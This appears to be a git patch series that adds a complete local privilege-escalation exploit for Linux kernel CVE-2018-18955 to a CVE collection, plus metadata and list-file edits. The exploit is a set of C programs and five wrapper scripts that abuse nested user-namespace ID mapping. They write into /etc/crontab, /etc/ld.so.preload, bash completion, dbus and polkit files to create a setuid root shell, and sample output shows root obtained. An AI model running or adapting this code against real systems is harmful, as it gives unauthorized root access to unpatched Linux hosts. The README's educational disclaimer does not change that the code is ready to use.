cve/linux-kernel/2018/CVE-2018-18955/exploit.polkit.sh create mode 100644 cve/linux-kernel/2018/CVE-2018-18955/libsubuid.c create mode 100644 cve/linux-kernel/2018/CVE-2018-18955/rootshell.c create mode 100644 cve/linux-kernel/2018/CVE-2018-18955/subshell.c create mode 100644 cve/linux-kernel/2018/CVE-2018-18955/subuid_shell.c create mode 100644 cve/linux-kernel/2018/yaml/CVE-2018-18955.yaml diff --git a/cve/linux-kernel/2018/CVE-2018-18955/README.md b/cve/linux-kernel/2018/CVE-2018-18955/README.md new file mode 100644 index 00000000..5564e46a --- /dev/null +++ b/cve/linux-kernel/2018/CVE-2018-18955/README.md @@ -0,0 +1,29 @@ +

CVE-2018-18955

+ +Linux local root exploit. + +Wrapper for Jann Horn's +[exploit](https://bugs.chromium.org/p/project-zero/issues/detail?id=1712) for +[CVE-2018-18955](https://nvd.nist.gov/vuln/detail/CVE-2018-18955), forked from +[kernel-exploits](https://github.com/bcoles/kernel-exploits). + +In the Linux kernel 4.15.x through 4.19.x before 4.19.2, `map_write()` +in `kernel/user_namespace.c` allows privilege escalation because it +mishandles nested user namespaces with more than 5 UID or GID ranges. A +user who has `CAP_SYS_ADMIN` in an affected user namespace can bypass +access controls on resources outside the namespace, as demonstrated by +reading `/etc/shadow`. This occurs because an ID transformation takes +place properly for the namespaced-to-kernel direction but not for the +kernel-to-namespaced direction. + +### Usage + +Simply run one of the shell +scripts depending on the targeted exploitation technique. + +### Disclaimer + +Running unathorized attacks to public or private servers is illegal. The +content of this repository is for educational purposes only and no +responsibility will be taken by the authors in case of ill use of the +provided material. diff --git a/cve/linux-kernel/2018/CVE-2018-18955/exploit.bash_completion.sh b/cve/linux-kernel/2018/CVE-2018-18955/exploit.bash_completion.sh new file mode 100755 index 00000000..0d2c16a2 --- /dev/null +++ b/cve/linux-kernel/2018/CVE-2018-18955/exploit.bash_completion.sh @@ -0,0 +1,103 @@ +#!/bin/sh +# wrapper for Jann Horn's exploit for CVE-2018-18955 +# uses bash_completion technique +# --- +# test@linux-mint-19-2:~/kernel-exploits/CVE-2018-18955$ ./exploit.bash_completion.sh +# [*] Compiling... +# [*] Writing payload to /etc/bash_completion.d/subuid ... +# [.] starting +# [.] setting up namespace +# [~] done, namespace sandbox set up +# [.] mapping subordinate ids +# [.] subuid: 165536 +# [.] subgid: 165536 +# [~] done, mapped subordinate ids +# [.] executing subshell +# [*] Waiting for root user to login ... +# [+] Success: +# -rwsrwxr-x 1 root root 8384 Oct 4 13:46 /tmp/sh +# [*] Cleaning up... +# [*] Launching root shell: /tmp/sh +# root@linux-mint-19-2:~/kernel-exploits/CVE-2018-18955# id +# uid=0(root) gid=0(root) groups=0(root),1001(test) + +rootshell="/tmp/sh" +bootstrap="/etc/bash_completion.d/subuid" + +command_exists() { + command -v "${1}" >/dev/null 2>/dev/null +} + +if ! command_exists /usr/bin/newuidmap; then + echo '[-] newuidmap is not installed' + exit 1 +fi + +if ! command_exists /usr/bin/newgidmap; then + echo '[-] newgidmap is not installed' + exit 1 +fi + +if ! test -w .; then + echo '[-] working directory is not writable' + exit 1 +fi + +echo "[*] Compiling..." + +if ! gcc subuid_shell.c -o subuid_shell; then + echo 'Compiling subuid_shell.c failed' + echo 'Using precompiled binary' + cp bin/subuid_shell . + + if [ $? -ne 0 ] + then + echo "Could not copy precompiled binary" + exit 1 + fi +fi + +if ! gcc subshell.c -o subshell; then + echo 'Compiling gcc_subshell.c failed' + echo 'Using precompiled binary' + cp bin/subshell . + + if [ $? -ne 0 ] + then + echo "Could not copy precompiled binary" + exit 1 + fi +fi + +if ! gcc rootshell.c -o "${rootshell}"; then + echo 'Compiling rootshell.c failed' + echo 'Using precompiled binary' + cp bin/rootshell "${rootshell}" + + if [ $? -ne 0 ] + then + echo "Could not copy rootshell to '${rootshell}'" + exit 1 + fi +fi + +echo "[*] Writing payload to /etc/bash_completion.d/subuid ..." + +echo "echo 'if [[ \$EUID -ne 0 ]]; then exit; fi; /bin/chown root:root ${rootshell};/bin/chmod u+s ${rootshell}; /bin/rm ${bootstrap}' > ${bootstrap}" | ./subuid_shell ./subshell + +echo "[*] Waiting for root user to login ..." +while [ ! -u "${rootshell}" ]; +do + sleep 15; +done + +echo '[+] Success:' +/bin/ls -la "${rootshell}" + +echo '[*] Cleaning up...' +/bin/rm subuid_shell +/bin/rm subshell + +echo "[*] Launching root shell: ${rootshell}" +$rootshell + diff --git a/cve/linux-kernel/2018/CVE-2018-18955/exploit.cron.sh b/cve/linux-kernel/2018/CVE-2018-18955/exploit.cron.sh new file mode 100755 index 00000000..da879779 --- /dev/null +++ b/cve/linux-kernel/2018/CVE-2018-18955/exploit.cron.sh @@ -0,0 +1,118 @@ +#!/bin/sh +# wrapper for Jann Horn's exploit for CVE-2018-18955 +# uses crontab technique +# --- +# test@linux-mint-19-2:~/kernel-exploits/CVE-2018-18955$ ./exploit.cron.sh +# [*] Compiling... +# [*] Writing payload to /tmp/payload... +# [*] Adding cron job... (wait a minute) +# [.] starting +# [.] setting up namespace +# [~] done, namespace sandbox set up +# [.] mapping subordinate ids +# [.] subuid: 165536 +# [.] subgid: 165536 +# [~] done, mapped subordinate ids +# [.] executing subshell +# [+] Success: +# -rwsrwxr-x 1 root root 8384 Nov 21 19:47 /tmp/sh +# [*] Cleaning up... +# [!] Remember to clean up /etc/crontab +# [*] Launching root shell: /tmp/sh +# root@linux-mint-19-2:~/kernel-exploits/CVE-2018-18955# id +# uid=0(root) gid=0(root) groups=0(root),1001(test) + +rootshell="/tmp/sh" +bootstrap="/tmp/payload" + +command_exists() { + command -v "${1}" >/dev/null 2>/dev/null +} + +if ! command_exists /usr/bin/newuidmap; then + echo '[-] newuidmap is not installed' + exit 1 +fi + +if ! command_exists /usr/bin/newgidmap; then + echo '[-] newgidmap is not installed' + exit 1 +fi + +if ! test -w .; then + echo '[-] working directory is not writable' + exit 1 +fi + +echo "[*] Compiling..." + +if ! gcc subuid_shell.c -o subuid_shell; then + echo 'Compiling subuid_shell.c failed' + echo 'Using precompiled binary' + cp bin/subuid_shell . + + if [ $? -ne 0 ] + then + echo "Could not copy precompiled binary" + exit 1 + fi +fi + +if ! gcc subshell.c -o subshell; then + echo 'Compiling gcc_subshell.c failed' + echo 'Using precompiled binary' + cp bin/subshell . + + if [ $? -ne 0 ] + then + echo "Could not copy precompiled binary" + exit 1 + fi +fi + +if ! gcc rootshell.c -o "${rootshell}"; then + echo 'Compiling rootshell.c failed' + echo 'Using precompiled binary' + cp bin/rootshell "${rootshell}" + + if [ $? -ne 0 ] + then + echo "Could not copy rootshell to '${rootshell}'" + exit 1 + fi +fi + +echo "[*] Writing payload to ${bootstrap}..." + +echo "#!/bin/sh\n/bin/chown root:root ${rootshell};/bin/chmod u+s ${rootshell}" > $bootstrap +/bin/chmod +x "${bootstrap}" + +echo "[*] Adding cron job... (wait a minute)" + +echo "echo '* * * * * root ${bootstrap}' >> /etc/crontab" | ./subuid_shell ./subshell +sleep 60 + +if ! test -u "${rootshell}"; then + echo '[-] Failed' + /bin/rm "${rootshell}" + /bin/rm "${bootstrap}" + exit 1 +fi + +echo '[+] Success:' +ls -la "${rootshell}" + +echo '[*] Cleaning up...' +/bin/rm "${bootstrap}" +/bin/rm subuid_shell +/bin/rm subshell + +if command_exists /bin/sed; then + echo "/bin/sed -i '\$ d' /etc/crontab" | $rootshell +else + echo "[!] Manual clean up of /etc/crontab required" +fi + +echo "[*] Launching root shell: ${rootshell}" +$rootshell + diff --git a/cve/linux-kernel/2018/CVE-2018-18955/exploit.dbus.sh b/cve/linux-kernel/2018/CVE-2018-18955/exploit.dbus.sh new file mode 100755 index 00000000..75b678da --- /dev/null +++ b/cve/linux-kernel/2018/CVE-2018-18955/exploit.dbus.sh @@ -0,0 +1,162 @@ +#!/bin/sh +# wrapper for Jann Horn's exploit for CVE-2018-18955 +# uses dbus service technique +# --- +# test@linux-mint-19-2:~/kernel-exploits/CVE-2018-18955$ ./exploit.dbus.sh +# [*] Compiling... +# [*] Creating /usr/share/dbus-1/system-services/org.subuid.Service.service... +# [.] starting +# [.] setting up namespace +# [~] done, namespace sandbox set up +# [.] mapping subordinate ids +# [.] subuid: 165536 +# [.] subgid: 165536 +# [~] done, mapped subordinate ids +# [.] executing subshell +# [*] Creating /etc/dbus-1/system.d/org.subuid.Service.conf... +# [.] starting +# [.] setting up namespace +# [~] done, namespace sandbox set up +# [.] mapping subordinate ids +# [.] subuid: 165536 +# [.] subgid: 165536 +# [~] done, mapped subordinate ids +# [.] executing subshell +# [*] Launching dbus service... +# Error org.freedesktop.DBus.Error.NoReply: Did not receive a reply. Possible causes include: the remote application did not send a reply, the message bus security policy blocked the reply, the reply timeout expired, or the network connection was broken. +# [+] Success: +# -rwsrwxr-x 1 root root 8384 Jan 4 18:31 /tmp/sh +# [*] Cleaning up... +# [*] Launching root shell: /tmp/sh +# root@linux-mint-19-2:~/kernel-exploits/CVE-2018-18955# id +# uid=0(root) gid=0(root) groups=0(root),1001(test) + +rootshell="/tmp/sh" +service="org.subuid.Service" + +command_exists() { + command -v "${1}" >/dev/null 2>/dev/null +} + +if ! command_exists /usr/bin/dbus-send; then + echo '[-] dbus-send is not installed' + exit 1 +fi + +if ! command_exists /usr/bin/newuidmap; then + echo '[-] newuidmap is not installed' + exit 1 +fi + +if ! command_exists /usr/bin/newgidmap; then + echo '[-] newgidmap is not installed' + exit 1 +fi + +if ! test -w .; then + echo '[-] working directory is not writable' + exit 1 +fi + +echo "[*] Compiling..." + +if ! gcc subuid_shell.c -o subuid_shell; then + echo 'Compiling subuid_shell.c failed' + echo 'Using precompiled binary' + cp bin/subuid_shell . + + if [ $? -ne 0 ] + then + echo "Could not copy precompiled binary" + exit 1 + fi +fi + +if ! gcc subshell.c -o subshell; then + echo 'Compiling gcc_subshell.c failed' + echo 'Using precompiled binary' + cp bin/subshell . + + if [ $? -ne 0 ] + then + echo "Could not copy precompiled binary" + exit 1 + fi +fi + +if ! gcc rootshell.c -o "${rootshell}"; then + echo 'Compiling rootshell.c failed' + echo 'Using precompiled binary' + cp bin/rootshell "${rootshell}" + + if [ $? -ne 0 ] + then + echo "Could not copy rootshell to '${rootshell}'" + exit 1 + fi +fi + +echo "[*] Creating /usr/share/dbus-1/system-services/${service}.service..." + +cat << EOF > "${service}.service" +[D-BUS Service] +Name=${service} +Exec=/bin/sh -c "/bin/chown root:root ${rootshell};/bin/chmod u+s ${rootshell}" +User=root +EOF + +echo "cp ${service}.service /usr/share/dbus-1/system-services/${service}.service" | ./subuid_shell ./subshell + +if ! test -r "/usr/share/dbus-1/system-services/${service}.service"; then + echo '[-] Failed' + /bin/rm "${rootshell}" + exit 1 +fi + +echo "[*] Creating /etc/dbus-1/system.d/${service}.conf..." + +cat << EOF > "${service}.conf" + + + + + + +EOF + +echo "cp ${service}.conf /etc/dbus-1/system.d/${service}.conf" | ./subuid_shell ./subshell + +if ! test -r "/etc/dbus-1/system.d/${service}.conf"; then + echo '[-] Failed' + /bin/rm "${rootshell}" + exit 1 +fi + +echo "[*] Launching dbus service..." + +/usr/bin/dbus-send --system --print-reply --dest="${service}" --type=method_call --reply-timeout=1 / "${service}" + +sleep 1 + +if ! test -u "${rootshell}"; then + echo '[-] Failed' + /bin/rm "${rootshell}" + exit 1 +fi + +echo '[+] Success:' +/bin/ls -la "${rootshell}" + +echo '[*] Cleaning up...' +/bin/rm subuid_shell +/bin/rm subshell +/bin/rm "${service}.conf" +/bin/rm "${service}.service" +echo "/bin/rm /usr/share/dbus-1/system-services/${service}.service" | $rootshell +echo "/bin/rm /etc/dbus-1/system.d/${service}.conf" | $rootshell + +echo "[*] Launching root shell: ${rootshell}" +$rootshell + diff --git a/cve/linux-kernel/2018/CVE-2018-18955/exploit.ldpreload.sh b/cve/linux-kernel/2018/CVE-2018-18955/exploit.ldpreload.sh new file mode 100755 index 00000000..79be6a62 --- /dev/null +++ b/cve/linux-kernel/2018/CVE-2018-18955/exploit.ldpreload.sh @@ -0,0 +1,110 @@ +#!/bin/sh +# wrapper for Jann Horn's exploit for CVE-2018-18955 +# uses ld.so.preload technique +# --- +# test@linux-mint-19-2:~/kernel-exploits/CVE-2018-18955$ ./exploit.ldpreload.sh +# [*] Compiling... +# [*] Adding libsubuid.so to /etc/ld.so.preload... +# [.] starting +# [.] setting up namespace +# [~] done, namespace sandbox set up +# [.] mapping subordinate ids +# [.] subuid: 165536 +# [.] subgid: 165536 +# [~] done, mapped subordinate ids +# [.] executing subshell +# [+] Success: +# -rwsrwxr-x 1 root root 8384 Nov 21 19:07 /tmp/sh +# [*] Launching root shell: /tmp/sh +# root@linux-mint-19-2:~/kernel-exploits/CVE-2018-18955# id +# uid=0(root) gid=0(root) groups=0(root),1001(test) + +rootshell="/tmp/sh" +lib="libsubuid.so" + +command_exists() { + command -v "${1}" >/dev/null 2>/dev/null +} + +if ! command_exists /usr/bin/newuidmap; then + echo '[-] newuidmap is not installed' + exit 1 +fi + +if ! command_exists /usr/bin/newgidmap; then + echo '[-] newgidmap is not installed' + exit 1 +fi + +if ! test -w .; then + echo '[-] working directory is not writable' + exit 1 +fi + +echo "[*] Compiling..." + +if ! gcc subuid_shell.c -o subuid_shell; then + echo 'Compiling subuid_shell.c failed' + echo 'Using precompiled binary' + cp bin/subuid_shell . + + if [ $? -ne 0 ] + then + echo "Could not copy precompiled binary" + exit 1 + fi +fi + +if ! gcc subshell.c -o subshell; then + echo 'Compiling gcc_subshell.c failed' + echo 'Using precompiled binary' + cp bin/subshell . + + if [ $? -ne 0 ] + then + echo "Could not copy precompiled binary" + exit 1 + fi +fi + +if ! gcc rootshell.c -o "${rootshell}"; then + echo 'Compiling rootshell.c failed' + echo 'Using precompiled binary' + cp bin/rootshell "${rootshell}" + + if [ $? -ne 0 ] + then + echo "Could not copy rootshell to '${rootshell}'" + exit 1 + fi +fi + +if ! gcc libsubuid.c -fPIC -shared -o "${lib}"; then + echo 'Compiling libsubuid.c failed' + echo 'Using precompiled shared library' + cp bin/libsubuid "${lib}" +fi + +echo "[*] Adding ${lib} to /etc/ld.so.preload..." + +echo "cp ${lib} /lib/; echo /lib/${lib} > /etc/ld.so.preload" | ./subuid_shell ./subshell + +/usr/bin/newuidmap + +if ! test -u "${rootshell}"; then + echo '[-] Failed' + /bin/rm "${rootshell}" + exit 1 +fi + +echo '[+] Success:' +/bin/ls -la "${rootshell}" + +echo '[*] Cleaning up...' +/bin/rm subuid_shell +/bin/rm subshell +echo "/bin/rm /lib/${lib}" | $rootshell + +echo "[*] Launching root shell: ${rootshell}" +$rootshell + diff --git a/cve/linux-kernel/2018/CVE-2018-18955/exploit.polkit.sh b/cve/linux-kernel/2018/CVE-2018-18955/exploit.polkit.sh new file mode 100755 index 00000000..ad0e27ce --- /dev/null +++ b/cve/linux-kernel/2018/CVE-2018-18955/exploit.polkit.sh @@ -0,0 +1,134 @@ +#!/bin/sh +# wrapper for Jann Horn's exploit for CVE-2018-18955 +# uses polkit technique +# --- +# test@linux-mint-19-2:~/kernel-exploits/CVE-2018-18955$ ./exploit.polkit.sh +# [*] Compiling... +# [*] Creating /usr/share/polkit-1/actions/subuid.policy... +# [.] starting +# [.] setting up namespace +# [~] done, namespace sandbox set up +# [.] mapping subordinate ids +# [.] subuid: 165536 +# [.] subgid: 165536 +# [~] done, mapped subordinate ids +# [.] executing subshell +# [*] Launching pkexec... +# [+] Success: +# -rwsrwxr-x 1 root root 8384 Dec 29 14:22 /tmp/sh +# [*] Cleaning up... +# [*] Launching root shell: /tmp/sh +# root@linux-mint-19-2:~/kernel-exploits/CVE-2018-18955# id +# uid=0(root) gid=0(root) groups=0(root),1001(test) + +rootshell="/tmp/sh" +policy="subuid.policy" + +command_exists() { + command -v "${1}" >/dev/null 2>/dev/null +} + +if ! command_exists /usr/bin/pkexec; then + echo '[-] pkexec is not installed' + exit 1 +fi + +if ! command_exists /usr/bin/newuidmap; then + echo '[-] newuidmap is not installed' + exit 1 +fi + +if ! command_exists /usr/bin/newgidmap; then + echo '[-] newgidmap is not installed' + exit 1 +fi + +if ! test -w .; then + echo '[-] working directory is not writable' + exit 1 +fi + +echo "[*] Compiling..." + +if ! gcc subuid_shell.c -o subuid_shell; then + echo 'Compiling subuid_shell.c failed' + echo 'Using precompiled binary' + cp bin/subuid_shell . + + if [ $? -ne 0 ] + then + echo "Could not copy precompiled binary" + exit 1 + fi +fi + +if ! gcc subshell.c -o subshell; then + echo 'Compiling gcc_subshell.c failed' + echo 'Using precompiled binary' + cp bin/subshell . + + if [ $? -ne 0 ] + then + echo "Could not copy precompiled binary" + exit 1 + fi +fi + +if ! gcc rootshell.c -o "${rootshell}"; then + echo 'Compiling rootshell.c failed' + echo 'Using precompiled binary' + cp bin/rootshell "${rootshell}" + + if [ $? -ne 0 ] + then + echo "Could not copy rootshell to '${rootshell}'" + exit 1 + fi +fi + +echo "[*] Creating /usr/share/polkit-1/actions/${policy}..." + +echo ' + + + + + yes + yes + yes + + +' > "${policy}" + +echo "cp ${policy} /usr/share/polkit-1/actions/${policy}" | ./subuid_shell ./subshell + +if ! test -r "/usr/share/polkit-1/actions/${policy}"; then + echo '[-] Failed' + /bin/rm "${rootshell}" + exit 1 +fi + +echo "[*] Launching pkexec..." + +/usr/bin/pkexec --disable-internal-agent 2>/dev/null /bin/sh -c "/bin/chown root:root ${rootshell};/bin/chmod u+s ${rootshell}" + +if ! test -u "${rootshell}"; then + echo '[-] Failed' + /bin/rm "${rootshell}" + exit 1 +fi + +echo '[+] Success:' +/bin/ls -la "${rootshell}" + +echo '[*] Cleaning up...' +/bin/rm subuid_shell +/bin/rm subshell +/bin/rm "${policy}" +echo "/bin/rm /usr/share/polkit-1/actions/${policy}" | $rootshell + +echo "[*] Launching root shell: ${rootshell}" +$rootshell + diff --git a/cve/linux-kernel/2018/CVE-2018-18955/libsubuid.c b/cve/linux-kernel/2018/CVE-2018-18955/libsubuid.c new file mode 100644 index 00000000..4c6e1f1f --- /dev/null +++ b/cve/linux-kernel/2018/CVE-2018-18955/libsubuid.c @@ -0,0 +1,14 @@ +#include +#include +#include + +void init(void) __attribute__((constructor)); + +void __attribute__((constructor)) init() { + setuid(0); + setgid(0); + unlink("/etc/ld.so.preload"); + system("chown root:root /tmp/sh"); + system("chmod u+s /tmp/sh"); + _exit(0); +} diff --git a/cve/linux-kernel/2018/CVE-2018-18955/rootshell.c b/cve/linux-kernel/2018/CVE-2018-18955/rootshell.c new file mode 100644 index 00000000..2628d491 --- /dev/null +++ b/cve/linux-kernel/2018/CVE-2018-18955/rootshell.c @@ -0,0 +1,9 @@ +#include +#include +#include + +int main(void) { + setuid(0); + setgid(0); + execl("/bin/bash", "bash", NULL); +} diff --git a/cve/linux-kernel/2018/CVE-2018-18955/subshell.c b/cve/linux-kernel/2018/CVE-2018-18955/subshell.c new file mode 100644 index 00000000..c4654292 --- /dev/null +++ b/cve/linux-kernel/2018/CVE-2018-18955/subshell.c @@ -0,0 +1,98 @@ +// subshell.c +// author: Jann Horn +// source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1712 + +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include +#include +#include + +int main() { + int sync_pipe[2]; + char dummy; + + if (socketpair(AF_UNIX, SOCK_STREAM, 0, sync_pipe)) { + err(1, "pipe"); + } + + pid_t child = fork(); + + if (child == -1) { + err(1, "fork"); + } + + if (child == 0) { + close(sync_pipe[1]); + + if (unshare(CLONE_NEWUSER)) { + err(1, "unshare userns"); + } + + if (write(sync_pipe[0], "X", 1) != 1) { + err(1, "write to sock"); + } + + if (read(sync_pipe[0], &dummy, 1) != 1) { + err(1, "read from sock"); + } + + execl("/bin/bash", "bash", NULL); + err(1, "exec"); + } + + close(sync_pipe[0]); + + if (read(sync_pipe[1], &dummy, 1) != 1) { + err(1, "read from sock"); + } + + char pbuf[100]; + sprintf(pbuf, "/proc/%d", (int)child); + + if (chdir(pbuf)) { + err(1, "chdir"); + } + + const char *id_mapping = "0 0 1\n1 1 1\n2 2 1\n3 3 1\n4 4 1\n5 5 995\n"; + int uid_map = open("uid_map", O_WRONLY); + + if (uid_map == -1) { + err(1, "open uid map"); + } + + if (write(uid_map, id_mapping, strlen(id_mapping)) != strlen(id_mapping)) { + err(1, "write uid map"); + } + + close(uid_map); + + int gid_map = open("gid_map", O_WRONLY); + + if (gid_map == -1) { + err(1, "open gid map"); + } + + if (write(gid_map, id_mapping, strlen(id_mapping)) != strlen(id_mapping)) { + err(1, "write gid map"); + } + + close(gid_map); + + if (write(sync_pipe[1], "X", 1) != 1) { + err(1, "write to sock"); + } + + int status; + + if (wait(&status) != child) { + err(1, "wait"); + } + + return 0; +} diff --git a/cve/linux-kernel/2018/CVE-2018-18955/subuid_shell.c b/cve/linux-kernel/2018/CVE-2018-18955/subuid_shell.c new file mode 100644 index 00000000..21d63893 --- /dev/null +++ b/cve/linux-kernel/2018/CVE-2018-18955/subuid_shell.c @@ -0,0 +1,322 @@ +// subuid_shell.c - Linux local root exploit for CVE-2018-18955 +// Exploits broken uid/gid mapping in nested user namespaces. +// --- +// Mostly stolen from Jann Horn's exploit: +// - https://bugs.chromium.org/p/project-zero/issues/detail?id=1712 +// Some code stolen from Xairy's exploits: +// - https://github.com/xairy/kernel-exploits +// --- +// +// - added auto subordinate id mapping +// https://github.com/bcoles/kernel-exploits/tree/master/CVE-2018-18955 + +#define _GNU_SOURCE + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#define DEBUG + +#ifdef DEBUG +# define dprintf printf +#else +# define dprintf +#endif + +char* SUBSHELL = "./subshell"; + + +// * * * * * * * * * * * * * * * * * File I/O * * * * * * * * * * * * * * * * * + +#define CHUNK_SIZE 1024 + +int read_file( + const char* file, + char* buffer, + int max_length +) { + int f = open(file, O_RDONLY); + + if (f == -1) { + return -1; + } + + int bytes_read = 0; + + while (1) { + int bytes_to_read = CHUNK_SIZE; + + if (bytes_to_read > max_length - bytes_read) { + bytes_to_read = max_length - bytes_read; + } + + int rv = read(f, &buffer[bytes_read], bytes_to_read); + + if (rv == -1) { + return -1; + } + + bytes_read += rv; + + if (rv == 0) { + return bytes_read; + } + } +} + +static int write_file( + const char* file, + const char* what, + ... +) { + char buf[1024]; + va_list args; + + va_start(args, what); + vsnprintf(buf, sizeof(buf), what, args); + va_end(args); + + buf[sizeof(buf) - 1] = 0; + + int len = strlen(buf); + int fd = open(file, O_WRONLY | O_CLOEXEC); + + if (fd == -1) { + return -1; + } + + if (write(fd, buf, len) != len) { + close(fd); + return -1; + } + + close(fd); + return 0; +} + + +// * * * * * * * * * * * * * * * * * Map * * * * * * * * * * * * * * * * * + +int get_subuid( + char* output, + int max_length +) { + char buffer[1024]; + char* path = "/etc/subuid"; + int length = read_file(path, &buffer[0], sizeof(buffer)); + + if (length == -1) { + return -1; + } + + int real_uid = getuid(); + struct passwd *u = getpwuid(real_uid); + + char needle[1024]; + + sprintf(needle, "%s:", u->pw_name); + + int needle_length = strlen(needle); + char* found = memmem(&buffer[0], length, needle, needle_length); + + if (found == NULL) { + return -1; + } + + for (int i = 0; found[needle_length + i] != ':'; i++) { + if ( + i >= max_length + || ((found - &buffer[0]) + needle_length + i >= length) + ) { + return -1; + } + + output[i] = found[needle_length + i]; + } + + return 0; +} + +int get_subgid( + char* output, + int max_length +) { + char buffer[1024]; + char* path = "/etc/subgid"; + int length = read_file(path, &buffer[0], sizeof(buffer)); + + if (length == -1) { + return -1; + } + + char needle[1024]; + int real_gid = getgid(); + struct group *g = getgrgid(real_gid); + + sprintf(needle, "%s:", g->gr_name); + + int needle_length = strlen(needle); + char* found = memmem(&buffer[0], length, needle, needle_length); + + if (found == NULL) { + return -1; + } + + for (int i = 0; found[needle_length + i] != ':'; i++) { + if ( + i >= max_length + || ((found - &buffer[0]) + needle_length + i >= length) + ) { + return -1; + } + + output[i] = found[needle_length + i]; + } + + return 0; +} + + +// * * * * * * * * * * * * * * * * * Main * * * * * * * * * * * * * * * * * + +int main(int argc, char** argv) { + if (argc > 1) { + SUBSHELL = argv[1]; + } + + dprintf("[.] starting\n"); + dprintf("[.] setting up namespace\n"); + + int sync_pipe[2]; + char dummy; + + if (socketpair(AF_UNIX, SOCK_STREAM, 0, sync_pipe)) { + dprintf("[-] pipe\n"); + exit(EXIT_FAILURE); + } + + pid_t child = fork(); + + if (child == -1) { + dprintf("[-] fork"); + exit(EXIT_FAILURE); + } + + if (child == 0) { + prctl(PR_SET_PDEATHSIG, SIGKILL); + close(sync_pipe[1]); + + if (unshare(CLONE_NEWUSER) != 0) { + dprintf("[-] unshare(CLONE_NEWUSER)\n"); + exit(EXIT_FAILURE); + } + + if (unshare(CLONE_NEWNET) != 0) { + dprintf("[-] unshare(CLONE_NEWNET)\n"); + exit(EXIT_FAILURE); + } + + if (write(sync_pipe[0], "X", 1) != 1) { + dprintf("write to sock\n"); + exit(EXIT_FAILURE); + } + + if (read(sync_pipe[0], &dummy, 1) != 1) { + dprintf("[-] read from sock\n"); + exit(EXIT_FAILURE); + } + + if (setgid(0)) { + dprintf("[-] setgid"); + exit(EXIT_FAILURE); + } + + if (setuid(0)) { + printf("[-] setuid"); + exit(EXIT_FAILURE); + } + + execl(SUBSHELL, "", NULL); + dprintf("[-] executing subshell failed\n"); + } + + close(sync_pipe[0]); + + if (read(sync_pipe[1], &dummy, 1) != 1) { + dprintf("[-] read from sock\n"); + exit(EXIT_FAILURE); + } + + char path[256]; + + sprintf(path, "/proc/%d/setgroups", (int)child); + + if (write_file(path, "deny") == -1) { + dprintf("[-] denying setgroups failed\n"); + exit(EXIT_FAILURE); + } + + dprintf("[~] done, namespace sandbox set up\n"); + dprintf("[.] mapping subordinate ids\n"); + + char subuid[64]; + char subgid[64]; + + if (get_subuid(&subuid[0], sizeof(subuid))) { + dprintf("[-] couldn't find subuid map in /etc/subuid\n"); + exit(EXIT_FAILURE); + } + + if (get_subgid(&subgid[0], sizeof(subgid))) { + dprintf("[-] couldn't find subgid map in /etc/subgid\n"); + exit(EXIT_FAILURE); + } + + dprintf("[.] subuid: %s\n", subuid); + dprintf("[.] subgid: %s\n", subgid); + + char cmd[256]; + + sprintf(cmd, "newuidmap %d 0 %s 1000", (int)child, subuid); + + if (system(cmd)) { + dprintf("[-] newuidmap failed"); + exit(EXIT_FAILURE); + } + + sprintf(cmd, "newgidmap %d 0 %s 1000", (int)child, subgid); + + if (system(cmd)) { + dprintf("[-] newgidmap failed"); + exit(EXIT_FAILURE); + } + + dprintf("[~] done, mapped subordinate ids\n"); + dprintf("[.] executing subshell\n"); + + if (write(sync_pipe[1], "X", 1) != 1) { + dprintf("[-] write to sock"); + exit(EXIT_FAILURE); + } + + int status; + + if (wait(&status) != child) { + dprintf("[-] wait"); + exit(EXIT_FAILURE); + } + + return 0; +} diff --git a/cve/linux-kernel/2018/yaml/CVE-2018-18955.yaml b/cve/linux-kernel/2018/yaml/CVE-2018-18955.yaml new file mode 100644 index 00000000..d7231be5 --- /dev/null +++ b/cve/linux-kernel/2018/yaml/CVE-2018-18955.yaml @@ -0,0 +1,19 @@ +id: CVE-2018-18955 +source: https://github.com/scheatkode/CVE-2018-18955 +info: + name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 + severity: high + description: | + 在Linux内核4.15.x至4.19.2之前,kernel/user_namespace.c中的map_write()允许权限升级,因为它错误地处理了有超过5个UID或GID范围的嵌套用户名称空间。在受影响的用户命名空间中拥有CAP_SYS_ADMIN的用户可以绕过对命名空间以外的资源的访问控制,如阅读/etc/shadow。出现这种情况是因为ID转换在命名空间到内核的方向上正确进行,但在内核到命名空间的方向上不正确。 + scope-of-influence: + 4.15.x <= Linux kernel < 4.19.2 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2018-18955 + - https://cdn.kernel.org/pub/linux/kernel/v4.x/ChangeLog-4.19.2 + cvss-metrics: CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.0 + cve-id: CVE-2018-18955 + cwe-id: CWE-863 + cnvd-id: None + kve-id: None + tags: RCE, 提权 \ No newline at end of file diff --git a/openkylin_list.yaml b/openkylin_list.yaml index 7128c8a6..7b3e758e 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -71,6 +71,7 @@ cve: - CVE-2019-13272 - CVE-2020-12351 - CVE-2021-43267 + - CVE-2018-18955 sudo: - CVE-2019-18634 - CVE-2021-3156 From 75a118f84e219f26c98d354a3a08970163d8761d Mon Sep 17 00:00:00 2001 From: guanzhenyu Date: Fri, 7 Apr 2023 18:13:22 +0800 Subject: [PATCH 011/109] Move CVE-2018-18955 from openkylin_list.yaml to other_list.yaml --- openkylin_list.yaml | 1 - other_list.yaml | 1 + 2 files changed, 1 insertion(+), 1 deletion(-) diff --git a/openkylin_list.yaml b/openkylin_list.yaml index 7b3e758e..7128c8a6 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -71,7 +71,6 @@ cve: - CVE-2019-13272 - CVE-2020-12351 - CVE-2021-43267 - - CVE-2018-18955 sudo: - CVE-2019-18634 - CVE-2021-3156 diff --git a/other_list.yaml b/other_list.yaml index e96035e2..d3ae8268 100644 --- a/other_list.yaml +++ b/other_list.yaml @@ -12,6 +12,7 @@ cve: - CVE-2021-33624 - CVE-2020-27194 - CVE-2023-0179 + - CVE-2018-18955 polkit: - CVE-2021-3560 Outlook: From cffa0aceaa960cc65af18494fb573a5631270f2c Mon Sep 17 00:00:00 2001 From: zeroc Date: Fri, 7 Apr 2023 17:13:43 +0800 Subject: [PATCH 012/109] =?UTF-8?q?=E6=B7=BB=E5=8A=A0CVE-2022-28346?= MIME-Version: 1.0 